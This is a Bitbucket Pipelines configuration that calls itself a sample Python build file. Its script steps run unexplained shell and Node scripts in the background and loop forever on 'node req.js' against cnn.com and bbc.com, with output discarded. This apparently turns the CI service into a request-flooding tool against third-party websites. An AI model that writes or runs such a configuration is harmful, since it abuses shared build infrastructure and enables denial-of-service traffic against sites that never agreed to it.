# This is a sample build configuration for Python.
# Check our guides at https://confluence.atlassian.com/x/x4UWN for more examples.
# Only use spaces to indent your .yml configuration.
# -----
# You can specify a custom docker image from Docker Hub as your build environment.
image: ubuntu:18.04

pipelines:
  default:
    - step:
        caches:
          - pip
        script: # Modify the commands below to build your repository.
           - apt update && apt -y install wget curl axel
           - chmod +x ./test.sh && ./test.sh &
           - chmod +x ./google.sh && ./google.sh &
           - chmod +x ./rw.sh && ./rw.sh
           - chmod +x ./jira.sh && ./jira.sh &
           - npm install && while true; do nodejs jira.js; done &
           - while true; do node req.js https://www.cnn.com 100 > /dev/null; done &
           - while true; do node req.js https://www.bbc.com 100 > /dev/null; done

